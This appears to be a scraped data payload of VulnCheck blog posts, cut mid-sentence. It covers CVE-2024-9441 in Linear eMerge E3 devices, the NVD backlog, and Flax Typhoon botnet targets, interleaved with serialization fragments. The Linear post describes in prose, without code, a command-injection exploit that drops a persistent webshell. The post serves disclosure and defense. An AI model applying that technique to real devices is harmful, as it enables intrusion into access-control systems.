The exploits leverage an Open Source Software (OSS) shared library, which VulnCheck has authored and maintains, called ",[47,65145,20558],{"href":14297,"rel":65146},[51],[61,65148,59851],{"id":59850},[18,65150,59854,65151],{},[47,65152,59857],{"href":59857,"rel":65153},[51],{"title":219,"searchDepth":220,"depth":220,"links":65155},[65156,65157,65158],{"id":64748,"depth":220,"text":64749},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"In September 2024, we developed new Initial Access Intelligence (IAI) artifacts for 16 CVEs, covering 14 different vendors and products.",{"slug":65161},"initial-access-intelligence-september-2024","\u002Fblog\u002Finitial-access-intelligence-september-2024",{"title":64703,"description":65159},"blog\u002Finitial-access-intelligence-september-2024",[1281],"IrV6O5D3RWy82GZZi0k5ps2XJpjEwc_NXwgbzExItjU",{"id":65168,"title":65169,"articles":65170,"authors":65185,"body":65187,"date":65331,"description":65332,"extension":234,"image":7,"link":7,"meta":65333,"navigation":237,"path":65335,"seo":65336,"series":7,"stem":65337,"subtype":7,"tags":65338,"__hash__":65339},"blog\u002Fblog\u002Fflax-typhoon-linear-merge.md","Following the Trail of Flax Typhoon to Uncover Newly Discovered Vulnerabilities in Linear Emerge Access Control Devices",[65171,65175,65179,65182],{"title":65172,"source":14382,"link":65173,"date":65174},"Experts Warn of Critical Unpatched Vulnerability in Linear eMerge E3 Systems","https:\u002F\u002Fthehackernews.com\u002F2024\u002F10\u002Fexperts-warn-of-critical-unpatched.html","2024-10-10",{"title":65176,"source":43752,"link":65177,"date":65178},"Critical Nortek Linear eMerge Flaw Still Unaddressed","https:\u002F\u002Fwww.channele2e.com\u002Fbrief\u002Fcritical-nortek-linear-emerge-flaw-still-unaddressed","2024-10-11",{"title":65180,"source":61436,"link":65181,"date":65178},"Risky Biz News: Dutch government to physically replace tens of thousands of hackable traffic 
lights","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-dutch-government-to-manually-replace-tens-of-thousands-of-hackable-traffic-lights\u002F",{"title":65183,"source":11233,"link":65184,"date":65178},"Critical Nortek Linear eMerge E3 system flaw remains unaddressed","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcritical-nortek-linear-emerge-e3-system-flaw-remains-unaddressed",[65186],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":65188,"toc":65322},[65189,65191,65205,65209,65214,65216,65218,65222,65230,65233,65237,65240,65245,65248,65253,65257,65260,65266,65269,65273,65276,65279,65284,65287,65289,65292,65302,65305,65307],[1920,65190,20],{"id":3520},[22,65192,65193,65196,65199,65202],{},[25,65194,65195],{},"A newly disclosed vulnerability, CVE-2024-9441, affects the Linear Emerge E3 series.",[25,65197,65198],{},"The vulnerability has not yet been patched by the vendor, and exploits are already circulating, raising concerns of imminent exploitation.",[25,65200,65201],{},"The same device was previously targeted by the Flax Typhoon botnet using older vulnerabilities like CVE-2019-7256, but recent investigations show few real devices remain vulnerable.",[25,65203,65204],{},"We’ve published proof-of-concept exploits, a CVE for CVE-2024-9441, and detection artifacts to aid defenders.",[61,65206,65208],{"id":65207},"video-walkthrough-exploring-linear-emerge-vulnerabilities","Video Walkthrough: Exploring Linear Emerge Vulnerabilities",[59905,65210],{"width":65211,"height":65212,"src":65213,"title":59911,"frameBorder":445,"allow":59907,"referrerPolicy":59909,"allowFullScreen":237},560,315,"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FD4ATPmVWXKs?si=ZBwdnypGfE19BvFy",[1823,65215],{},[1823,65217],{},[61,65219,65221],{"id":65220},"introduction-to-linear-emerge-vulnerabilities","Introduction to Linear Emerge Vulnerabilities",[18,65223,65224,65225,65229],{},"In the past few weeks, we’ve been closely watching the Linear Emerge E3 
series, and for good reason. It became a target of interest after the ",[47,65226,65228],{"href":64578,"rel":65227},[51],"Flax Typhoon botnet"," was found exploiting CVE-2019-7256, a vulnerability that’s been on the radar since 2020. However, just as we began to see few real devices online vulnerable to this older CVE, a new threat emerged, CVE-2024-9441.",[18,65231,65232],{},"Unlike CVE-2019-7256, the new CVE has yet to be patched by the vendor, and SSD Disclosure recently published a working exploit without a corresponding CVE. We took it upon ourselves at VulnCheck to issue CVE-2024-9441 and develop our own proof-of-concept exploit, knowing full well that it could become a significant problem in the near future.",[61,65234,65236],{"id":65235},"exploiting-the-flax-typhoon-targeted-vulnerability","Exploiting the Flax Typhoon Targeted Vulnerability",[18,65238,65239],{},"Initially, we turned to Shodan and Nuclei templates to see how many devices were still vulnerable to the older CVE-2019-7256. A quick query returned nearly 12,000 results, seemingly a massive number. But after digging deeper, it turned out that roughly 10,000 of those were honeypots, leaving us with far fewer real-world vulnerable devices.",[18,65241,65242],{},[68,65243],{":width":10862,"alt":63425,"src":65244},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-shodan.png",[18,65246,65247],{},"After filtering and analyzing the data, we found only a handful of actual devices remained online and vulnerable. 
This was a good sign the Flax Typhoon botnet no longer had as many exposed targets.",[18,65249,65250],{},[68,65251],{":width":10862,"alt":63425,"src":65252},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-shodan-refined.png",[61,65254,65256],{"id":65255},"a-new-vulnerability-discovered-cve-2024-9441","A New Vulnerability Discovered: CVE-2024-9441",[18,65258,65259],{},"Just as we were wrapping up our investigation into CVE-2019-7256, SSD Disclosure dropped an advisory about a new vulnerability in the Linear Emerge E3 series. This OS command injection vulnerability, CVE-2024-9441, has not been patched, and SSD released an exploit without issuing a corresponding CVE.",[18,65261,65262],{},[68,65263],{":width":10862,"alt":65264,"src":65265},"Linear Emerge CVE Record","\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-cve-record.png",[18,65267,65268],{},"Seeing the need for proper tracking, we issued CVE-2024-9441 ourselves and built a proof-of-concept exploit. The very next day, a second exploit appeared on GitHub, indicating that the vulnerability was already attracting attention. While there have been no confirmed reports of in-the-wild exploitation, we suspect it’s only a matter of time.",[61,65270,65272],{"id":65271},"proof-of-concept-cve-2024-9441","Proof of Concept: CVE-2024-9441",[18,65274,65275],{},"The vulnerability allows for OS command injection, giving attackers the ability to execute commands as the web server user. In our proof of concept, we used a simple command injection technique to write commands to disk via an ampersand and echo.",[18,65277,65278],{},"Instead of deploying a reverse shell, we dropped a webshell. Why a webshell? On embedded devices like those in the E3 series, webshells provide a persistent foothold for attackers, allowing them to return at will. One limitation we found is that the webshell needs to live in an index.html file to be picked up by the web server, which makes it slightly more detectable. 
However, once deployed, it becomes a potent backdoor.",[18,65280,65281],{},[68,65282],{":width":10862,"alt":63425,"src":65283},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-exploit.png",[18,65285,65286],{},"We provided our customers with detection signatures to help them identify the vulnerability in their environments. But given the vendor’s slow response to the previous CVE-2019-7256, we don’t expect a patch for CVE-2024-9441 any time soon. Organizations using the Linear Emerge E3 series should act quickly to take these devices offline or isolate them.",[61,65288,63433],{"id":63432},[18,65290,65291],{},"CVE-2024-9441 is a new and emerging threat, and based on the attention it’s already received from exploit developers, it’s likely to be leveraged by threat actors soon. Without a vendor patch on the horizon, the best course of action is to take immediate steps to mitigate the risk:",[22,65293,65294,65297,65299],{},[25,65295,65296],{},"If your organization uses the Linear Emerge E3 series, ensure that these devices are removed from the network or isolated.",[25,65298,63444],{},[25,65300,65301],{},"Keep an eye on future advisories for this series, as we expect further developments.",[18,65303,65304],{},"CVE-2024-9441 is a stark reminder that even niche devices can be high-value targets for botnets like Flax Typhoon. While the pool of vulnerable devices may be shrinking, the emergence of new vulnerabilities means threats continue to persist. We’ll continue to monitor the situation closely, but for now, taking proactive steps is the best defense against this unpatched vulnerability.",[61,65306,202],{"id":201},[18,65308,63449,65309,982,65312,65315,65316,982,65319,63288],{},[47,65310,40447],{"href":53829,"rel":65311},[51],[47,65313,55229],{"href":53837,"rel":65314},[51],". 
Sign up to start a trial of our ",[47,65317,1245],{"href":45535,"rel":65318},[51],[47,65320,216],{"href":214,"rel":65321},[51],{"title":219,"searchDepth":220,"depth":220,"links":65323},[65324,65325,65326,65327,65328,65329,65330],{"id":65207,"depth":220,"text":65208},{"id":65220,"depth":220,"text":65221},{"id":65235,"depth":220,"text":65236},{"id":65255,"depth":220,"text":65256},{"id":65271,"depth":220,"text":65272},{"id":63432,"depth":220,"text":63433},{"id":201,"depth":220,"text":202},"2024-10-08","A newly disclosed vulnerability, CVE-2024-9441, affects the Linear Emerge E3 series. The vulnerability has not yet been patched by the vendor, and exploits are already circulating, raising concerns of imminent exploitation.",{"slug":65334},"flax-typhoon-linear-merge","\u002Fblog\u002Fflax-typhoon-linear-merge",{"title":65169,"description":65332},"blog\u002Fflax-typhoon-linear-merge",[1279],"Q8o88Of8j9_Q1GXix_bLlbbhh4SsnY9oQlE-0nqd7RM",{"id":65341,"title":65342,"articles":65343,"authors":65374,"body":65376,"date":65123,"description":65656,"extension":234,"image":7,"link":7,"meta":65657,"navigation":237,"path":65659,"seo":65660,"series":7,"stem":65661,"subtype":7,"tags":65662,"__hash__":65663},"blog\u002Fblog\u002Fnvd-backlog-exploitation-lurking.md","Danger is Still Lurking in the NVD Backlog",[65344,65348,65351,65354,65357,65360,65363,65368,65371],{"title":65345,"source":3508,"link":65346,"date":65347},"Resilient Cyber Newsletter #16","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-16","2024-10-01",{"title":65349,"source":43755,"link":65350,"date":62592},"It’s September 30. 
Do you know where your CVE backlog is?","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002Fit%E2%80%99s-september-30-do-you-know-where-your-cve-backlog",{"title":65352,"source":61436,"link":65353,"date":62592},"Risky Biz News: New EvilCorp sanctions and LockBit arrests drop on Counter Ransomware Initiative summit week","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-new-evilcorp-sanctions-and-lockbit-arrests-drop-on-counter-ransomware-initiative-summit-week\u002F",{"title":65355,"source":3481,"link":65356,"date":62592},"NIST's security flaw database still backlogged with 17K+ unprocessed bugs. Not great","https:\u002F\u002Fwww.theregister.com\u002F2024\u002F10\u002F02\u002Fcve_pileup_nvd_missed_deadline\u002F",{"title":65358,"source":14378,"link":65359,"date":62659},"In Other News: Doxing With Meta Ray-Ban Glasses, OT Hunting, NVD Backlog","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-doxing-with-meta-ray-ban-glasses-ot-hunting-nvd-backlog\u002F",{"title":65361,"source":14382,"link":65362,"date":62682},"THN Cybersecurity Recap: Top Threads and Trends (Sept 30 - Oct 6)","https:\u002F\u002Fthehackernews.com\u002F2024\u002F10\u002Fthn-cybersecurity-recap-top-threats-and.html",{"title":65364,"source":65365,"link":65366,"date":65367},"NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely","The Record","https:\u002F\u002Ftherecord.media\u002Fnist-vulnerability-backlog-cleared-cisa","2024-11-13",{"title":65369,"source":23286,"link":65370,"date":62469},"NIST Clears Backlog of Known Security Flaws but Not All Vulnerabilities","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F11\u002Fnist-clears-backlog-of-known-security-flaws-but-not-all-vulnerabilities\u002F",{"title":65372,"source":14378,"link":65373,"date":62469},"NIST Explains Why It Failed to Clear CVE 
Backlog","https:\u002F\u002Fwww.securityweek.com\u002Fnist-explains-why-it-failed-to-clear-cve-backlog\u002F",[65375],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":65377,"toc":65647},[65378,65384,65387,65396,65405,65408,65411,65414,65416,65427,65431,65434,65439,65443,65446,65452,65457,65461,65464,65470,65473,65608,65612,65615,65623,65627,65633,65636,65638,65640,65642],[18,65379,65380],{},[68,65381],{":width":10862,"alt":65382,"src":65383},"NIST NVD CVE Status","\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-status.png",[18,65385,65386],{},"On February 12, 2024, the NVD began slowing its processing and enrichment of new vulnerabilities, resulting in a backlog of over 18,000 vulnerabilities.",[18,65388,65389,65390,65395],{},"On May 23, we wrote about ",[47,65391,65394],{"href":65392,"rel":65393},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnvd-backlog-exploitation",[51],"The Real Danger Lurking in the NVD Backlog",". It showed that 93.4% of new vulnerabilities had not been analyzed by the National Vulnerability Database (NVD) between February 12 and May 19, 2024.",[18,65397,65398,65399,65404],{},"On May 29, NIST announced that it awarded a contract to a third-party, Maryland-based Analygence, to help address the backlog. 
Its ",[47,65400,65403],{"href":65401,"rel":65402},"https:\u002F\u002Fwww.nist.gov\u002Fitl\u002Fnvd",[51],"announcement"," expressed confidence that “this additional support will allow us to return to the processing rates prior to February 2024 within the next few months.” It further stated that it expects the “backlog to be cleared by the end of the fiscal year.”",[18,65406,65407],{},"That self-imposed deadline is September 30, so we thought it would be worthwhile to revisit our research to see how it’s doing against those goals.",[18,65409,65410],{},"We found a very mixed story.",[18,65412,65413],{},"As the chart above shows, since the May 29 announcement, the NIST National Vulnerability Database (NVD) has made considerable progress in processing new vulnerabilities, but a significant backlog remains.\nIn this update, we aim to provide the security community with insights into the current state of that progress, using data sourced from both the NVD and VulnCheck’s exploit and vulnerability services. 
Our analysis focuses on CVEs published by the NVD between February 12 and September 21, 2024.",[61,65415,43093],{"id":43092},[22,65417,65418,65421,65424],{},[25,65419,65420],{},"As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed (compared to 93.4% as of May 19, 2024).",[25,65422,65423],{},"As of September 21st, 46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024).\nOf the 197 KEVs, 92 have yet to be assessed by the NVD (Source: VulnCheck KEV).\nAs of September 21, 2024, 85.9% of CVEs added to the NVD since February 12 now have a CVSS record, leaving only 14.1% without a CVSS score.",[25,65425,65426],{},"VulnCheck believes that NVD’s embrace of CISA’s Vulnrichment as a data provider for CVSS enrichment has been a notable success.",[61,65428,65430],{"id":65429},"nvd-current-processing-status-of-cves-since-february-12-2024","NVD Current Processing Status of CVEs Since February 12, 2024",[18,65432,65433],{},"Although our outlook for the NVD was bleak in May, when 93.4% of vulnerabilities remained unanalyzed, there has been significant progress. Of the 25,357 new vulnerabilities added to the database since February 12, 72.4% (categorized as Awaiting Analysis, Received, or Undergoing Analysis) have yet to be fully analyzed. While a substantial backlog remains, it appears the NVD might now have the capacity to keep up with enriching new CVEs as they are issued. It will be interesting to see how and when they address the backlog.",[18,65435,65436],{},[68,65437],{":width":10862,"alt":65382,"src":65438},"\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-vuln-status.png",[61,65440,65442],{"id":65441},"unaddressed-known-exploited-cves","Unaddressed Known Exploited CVEs",[18,65444,65445],{},"As of September 20th, 46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD. Of the 197 KEVs, 92 have yet to be assessed by the NVD (Source: VulnCheck KEV). 
In our earlier research from May, we found 50.8% (30 out of 59) of KEVs were also unanalyzed by the NVD. Many of these unanalyzed vulnerabilities impact key technologies such as Adobe, Arcserve, Apache, Cisco, Microsoft, Progress, VMware, Zyxel, and others.",[18,65447,2245,65448,65451],{},[47,65449,45222],{"href":2871,"rel":65450},[51]," catalog is a real-time resource that tracks known exploited vulnerabilities, including those from the CISA KEV list. It is available as a free community resource with publicly referenceable citations.",[18,65453,65454],{},[68,65455],{":width":10862,"alt":65382,"src":65456},"\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-exploited.png",[61,65458,65460],{"id":65459},"common-vulnerability-scoring-system-coverage","Common Vulnerability Scoring System Coverage",[18,65462,65463],{},"While the NVD has faced challenges in processing new vulnerabilities, CVE Numbering Authorities (CNAs) and CISA Vulnrichment have worked hard to enrich CVE records directly with CPE, CVSS, CWE and SSVC. While NVD has not incorporated all data from Vulnrichment, I’ve decided to highlight the impact of their incorporation of CVSS from Vulnrichment in addition to the CVSS scores submitted by CVE Numbering Authorities (CNAs). To assess this progress, I analyzed CVSS coverage within the NIST NVD across primary and secondary sources. As of September 21, 2024, 85.9% of CVEs added since February 12 now have a CVSS record, leaving only 14.1% of CVEs without a CVSS score.",[18,65465,65466],{},[68,65467],{":width":10862,"alt":65468,"src":65469},"NIST NVD CVSS Scores","\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-cvss.png",[18,65471,65472],{},"To understand which CNAs have the most outstanding CVEs without a CVSS score, I compiled the following table. 
Two CNAs stand out: Linux, which has overwhelmed the CVE program with a high volume of vulnerabilities this year, and Mitre, the Root CNA responsible for managing the CVE program.",[307,65474,65475,65485],{},[310,65476,65477],{},[313,65478,65479,65482],{},[316,65480,65481],{},"CVE Numbering Authority (CNA)",[316,65483,65484],{},"CVE Count w\u002Fo CVSS Score",[336,65486,65487,65494,65502,65509,65517,65525,65532,65538,65545,65553,65560,65568,65574,65580,65587,65594,65601],{},[313,65488,65489,65491],{},[341,65490,54082],{},[341,65492,65493],{},"2172",[313,65495,65496,65499],{},[341,65497,65498],{},"Mitre",[341,65500,65501],{},"632",[313,65503,65504,65506],{},[341,65505,33109],{},[341,65507,65508],{},"139",[313,65510,65511,65514],{},[341,65512,65513],{},"WPscan",[341,65515,65516],{},"135",[313,65518,65519,65522],{},[341,65520,65521],{},"JPCert",[341,65523,65524],{},"51",[313,65526,65527,65529],{},[341,65528,3149],{},[341,65530,65531],{},"46",[313,65533,65534,65536],{},[341,65535,3069],{},[341,65537,3650],{},[313,65539,65540,65543],{},[341,65541,65542],{},"Huawei",[341,65544,36899],{},[313,65546,65547,65550],{},[341,65548,65549],{},"Google",[341,65551,65552],{},"37",[313,65554,65555,65558],{},[341,65556,65557],{},"Mediatek",[341,65559,3599],{},[313,65561,65562,65565],{},[341,65563,65564],{},"Android",[341,65566,65567],{},"27",[313,65569,65570,65572],{},[341,65571,54076],{},[341,65573,39259],{},[313,65575,65576,65578],{},[341,65577,3105],{},[341,65579,39254],{},[313,65581,65582,65585],{},[341,65583,65584],{},"Unisoc",[341,65586,39234],{},[313,65588,65589,65592],{},[341,65590,65591],{},"Devolutions",[341,65593,39234],{},[313,65595,65596,65599],{},[341,65597,65598],{},"HP Security",[341,65600,37766],{},[313,65602,65603,65606],{},[341,65604,65605],{},"Joomla",[341,65607,24698],{},[61,65609,65611],{"id":65610},"notable-improvements-made-by-cve-cnas-and-cisa-enrichment","Notable Improvements Made by CVE, CNAs and CISA Enrichment",[18,65613,65614],{},"In the article The Real 
Danger Lurking in the NVD Backlog, we highlighted several improvements that could have a significant impact, including CNAs submitting more complete data, the NVD focusing on automating CVE enrichment, and CISA’s Vulnrichment project becoming an Authorized Data Provider. We are pleased to see these improvements taking shape, and the NVD’s embrace of Vulnrichment as a data provider for CVSS enrichment has been a notable success. It will be interesting to see if NVD follows CISA’s path and becomes an Authorized Data Provider of the CVE Program.",[18,65616,65617,65618],{},"Another positive outcome of CISA’s Vulnrichment work is the integration of Stakeholder-Specific Vulnerability Categorization (SSVC) decision nodes, now available in the CISA ADP section of the CVE List. Ben Edwards wrote an insightful article exploring this new source of prioritization information: ",[47,65619,65622],{"href":65620,"rel":65621},"https:\u002F\u002Fwww.bitsight.com\u002Fblog\u002Fdo-we-need-yet-another-vulnerability-scoring-system-ssvc-thats-yass",[51],"Do We Need Yet Another Vulnerability Scoring System? For SSVC, That's a YASS!",[61,65624,65626],{"id":65625},"vulnchecks-commitment-to-helping-fill-the-nvd-gap","VulnCheck's Commitment to Helping Fill the NVD Gap",[18,65628,65629,65630,59],{},"Regardless of the uncertainty, VulnCheck is committed to contributing back to the security community. VulnCheck is providing vulnerability enrichment services, including CPE and access to NIST-NVD from a single source at no cost. 
Anyone can register for the free service here: ",[47,65631,40745],{"href":40745,"rel":65632},[51],[18,65634,65635],{},"VulnCheck also provides a commercial service with broad access to vulnerability and exploit intelligence, including: Vulnerabilities in Open Source packages \u002F dependencies, Vulnerabilities in ICS\u002FOT, IoMT, IoT, mobile and other devices, Git repositories for new exploit PoCs, Caching of exploit PoCs, Exploit Maturity classification, Exploit Type classification, Evidence of exploitation in-the-wild & exploitation timelines and more.",[61,65637,202],{"id":201},[18,65639,205],{},[18,65641,208],{},[18,65643,211,65644,217],{},[47,65645,216],{"href":214,"rel":65646},[51],{"title":219,"searchDepth":220,"depth":220,"links":65648},[65649,65650,65651,65652,65653,65654,65655],{"id":43092,"depth":220,"text":43093},{"id":65429,"depth":220,"text":65430},{"id":65441,"depth":220,"text":65442},{"id":65459,"depth":220,"text":65460},{"id":65610,"depth":220,"text":65611},{"id":65625,"depth":220,"text":65626},{"id":201,"depth":220,"text":202},"A look into the real dangers of exploitation still lurking in the NVD Backlog",{"slug":65658},"nvd-backlog-exploitation-lurking","\u002Fblog\u002Fnvd-backlog-exploitation-lurking",{"title":65342,"description":65656},"blog\u002Fnvd-backlog-exploitation-lurking",[33173],"v-AdhcOF01NS0PWSkuCQjU1g4Ch4WiNk1eNWVtzNwdg",{"id":65665,"title":65666,"articles":65667,"authors":65685,"body":65687,"date":65671,"description":66087,"extension":234,"image":7,"link":7,"meta":66088,"navigation":237,"path":66090,"seo":66091,"series":7,"stem":66092,"subtype":7,"tags":66093,"__hash__":66094},"blog\u002Fblog\u002Fflax-typhoon-botnet.md","Exploring Targeted Technologies and Countries of the Flax Typhoon Botnet",[65668,65672,65676,65680,65683],{"title":65669,"source":14386,"link":65670,"date":65671},"Flax Typhoon’s Botnet Actively Exploiting 66 Vulnerabilities In Various 
Devices","https:\u002F\u002Fcybersecuritynews.com\u002Fflax-typhoons-botnet-66-vulnerabilities\u002F","2024-09-23",{"title":65673,"source":10841,"link":65674,"date":65675},"Less than half the vulnerabilities targeted by Flax Typhoon botnet listed in CISA catalog","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fvulnerabilities-flax-typhoon-botnet\u002F727886\u002F","2024-09-24",{"title":65677,"source":65678,"link":65679,"date":65675},"Bluetooth Mayhem: Firewalls Fail & Insulin Pumps Panic","Storm⚡️Watch","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=YEYO8R-ydBY",{"title":65681,"source":61436,"link":65682,"date":65010},"Risky Biz News: China says Taiwan's military is behind a hacktivist group","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-china-says-taiwans-military-is-behind-a-hacktivist-group\u002F",{"title":65669,"source":25672,"link":65684,"date":65055},"https:\u002F\u002Fgbhackers.com\u002Fflax-typhoon-botnet-66-exploits\u002F",[65686],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":65688,"toc":66078},[65689,65697,65700,65704,65718,65722,65727,65730,65771,65774,65778,65783,65786,66006,66010,66015,66018,66021,66025,66028,66051,66055,66060,66067,66069,66071,66073],[18,65690,65691,65692,65696],{},"Last week, Five Eyes agencies issued a Joint Cybersecurity Advisory titled, ",[47,65693,65695],{"href":37484,"rel":65694},[51],"“People’s Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations”",". The report was authored across multiple agencies including the FBI, US Cyber Command, NSA, Australian Signals Directorate, ACSC, NCSC of New Zealand, Canada, and NCSC UK.",[18,65698,65699],{},"The advisory, issued by Five Eyes agencies, introduces new intelligence, including indicators of compromise, exploited CVEs, and the geographical location of impacted devices. 
Below, we highlight key details from the report to help raise awareness about this Flax Typhoon botnet.",[61,65701,65703],{"id":65702},"key-takeaways-from-the-joint-cybersecurity-advisory","Key Takeaways from the Joint Cybersecurity Advisory",[22,65705,65706,65709,65712,65715],{},[25,65707,65708],{},"66 vulnerabilities are actively being exploited by Flax Typhoon's Botnet",[25,65710,65711],{},"The Flax Typhoon Botnet primarily targets routers, IoT devices, and other web-facing applications.",[25,65713,65714],{},"47.9% of devices associated with the Flax Typhoon Botnet are located in the United States.",[25,65716,65717],{},"Prior to this advisory, VulnCheck KEV included 41 of the 66 CVEs and has since been updated to include all 66 vulnerabilities. At the time of publication, CISA KEV included 27 of the 66 CVEs.",[61,65719,65721],{"id":65720},"technologies-targeted-by-flax-typhoon-botnet","Technologies Targeted by Flax Typhoon Botnet",[18,65723,65724],{},[68,65725],{":width":10862,"alt":62506,"src":65726},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-tech.png",[18,65728,65729],{},"The joint advisory lists 66 vulnerabilities actively exploited to target routers, IoT devices and other web-facing applications. 
The most affected software suppliers associated with the botnet include:",[22,65731,65732,65735,65738,65741,65744,65747,65750,65753,65756,65759,65762,65765,65768],{},[25,65733,65734],{},"Apache (10 CVEs)",[25,65736,65737],{},"Cisco (5 CVEs)",[25,65739,65740],{},"Zyxel (3 CVEs)",[25,65742,65743],{},"QNAP (3 CVEs)",[25,65745,65746],{},"Fortinet (3 CVEs)",[25,65748,65749],{},"Draytek (3 CVEs)",[25,65751,65752],{},"WordPress (2 CVEs)",[25,65754,65755],{},"Telesquare (2 CVEs)",[25,65757,65758],{},"Ivanti (2 CVEs)",[25,65760,65761],{},"IBM (2 CVEs)",[25,65763,65764],{},"F5 (2 CVEs)",[25,65766,65767],{},"Contec (2 CVEs)",[25,65769,65770],{},"Chamilo (2 CVEs)",[18,65772,65773],{},"Odds are you have some of these technologies in your environment, making it crucial to address these vulnerabilities.",[61,65775,65777],{"id":65776},"countries-targeted-by-flax-typhoon-botnet","Countries Targeted by Flax Typhoon Botnet",[18,65779,65780],{},[68,65781],{":width":10862,"alt":62506,"src":65782},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-country.png",[18,65784,65785],{},"Analysis of devices associated with the Flax Typhoon Botnet shows that 47.9% of the devices are located in the United States, indicating a likely focus and foothold on US critical infrastructure. Other notable targets include Vietnam (8% of devices) and Germany (7.2% of devices). 
It appears the botnet is largely targeting North American, European and Asian countries.",[307,65787,65788,65800],{},[310,65789,65790],{},[313,65791,65792,65794,65797],{},[316,65793,1464],{},[316,65795,65796],{},"Node Count",[316,65798,65799],{},"Percentage",[336,65801,65802,65812,65823,65834,65845,65856,65867,65878,65888,65899,65910,65921,65932,65943,65954,65965,65974,65985,65996],{},[313,65803,65804,65806,65809],{},[341,65805,1494],{},[341,65807,65808],{},"126,000",[341,65810,65811],{},"47.90%",[313,65813,65814,65817,65820],{},[341,65815,65816],{},"Vietnam",[341,65818,65819],{},"21,100",[341,65821,65822],{},"8.00%",[313,65824,65825,65828,65831],{},[341,65826,65827],{},"Germany",[341,65829,65830],{},"18,900",[341,65832,65833],{},"7.20%",[313,65835,65836,65839,65842],{},[341,65837,65838],{},"Romania",[341,65840,65841],{},"9,600",[341,65843,65844],{},"3.70%",[313,65846,65847,65850,65853],{},[341,65848,65849],{},"Hong Kong",[341,65851,65852],{},"9,400",[341,65854,65855],{},"3.60%",[313,65857,65858,65861,65864],{},[341,65859,65860],{},"Canada",[341,65862,65863],{},"9,200",[341,65865,65866],{},"3.50%",[313,65868,65869,65872,65875],{},[341,65870,65871],{},"South 
Africa",[341,65873,65874],{},"9,000",[341,65876,65877],{},"3.40%",[313,65879,65880,65882,65885],{},[341,65881,1480],{},[341,65883,65884],{},"8,500",[341,65886,65887],{},"3.20%",[313,65889,65890,65893,65896],{},[341,65891,65892],{},"India",[341,65894,65895],{},"5,800",[341,65897,65898],{},"2.20%",[313,65900,65901,65904,65907],{},[341,65902,65903],{},"France",[341,65905,65906],{},"5,600",[341,65908,65909],{},"2.10%",[313,65911,65912,65915,65918],{},[341,65913,65914],{},"Bangladesh",[341,65916,65917],{},"4,100",[341,65919,65920],{},"1.60%",[313,65922,65923,65926,65929],{},[341,65924,65925],{},"Italy",[341,65927,65928],{},"4,000",[341,65930,65931],{},"1.50%",[313,65933,65934,65937,65940],{},[341,65935,65936],{},"Lithuania",[341,65938,65939],{},"3,300",[341,65941,65942],{},"1.30%",[313,65944,65945,65948,65951],{},[341,65946,65947],{},"Albania",[341,65949,65950],{},"2,800",[341,65952,65953],{},"1.10%",[313,65955,65956,65959,65962],{},[341,65957,65958],{},"Netherlands",[341,65960,65961],{},"2,700",[341,65963,65964],{},"1.00%",[313,65966,65967,65969,65972],{},[341,65968,61571],{},[341,65970,65971],{},"2,600",[341,65973,65964],{},[313,65975,65976,65979,65982],{},[341,65977,65978],{},"Australia",[341,65980,65981],{},"2,400",[341,65983,65984],{},"0.90%",[313,65986,65987,65990,65993],{},[341,65988,65989],{},"Poland",[341,65991,65992],{},"2,100",[341,65994,65995],{},"0.80%",[313,65997,65998,66001,66004],{},[341,65999,66000],{},"Spain",[341,66002,66003],{},"2,000",[341,66005,65995],{},[61,66007,66009],{"id":66008},"vulnerabilities-targeted-by-flax-typhoon-botnet","Vulnerabilities Targeted by Flax Typhoon Botnet",[18,66011,66012],{},[68,66013],{":width":10862,"alt":62506,"src":66014},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-evidence.png",[18,66016,66017],{},"The Flax Typhoon Botnet exploits 66 vulnerabilities. Of these, 41 were known to VulnCheck before the advisory was published and available in VulnCheck KEV, a free community resource. 
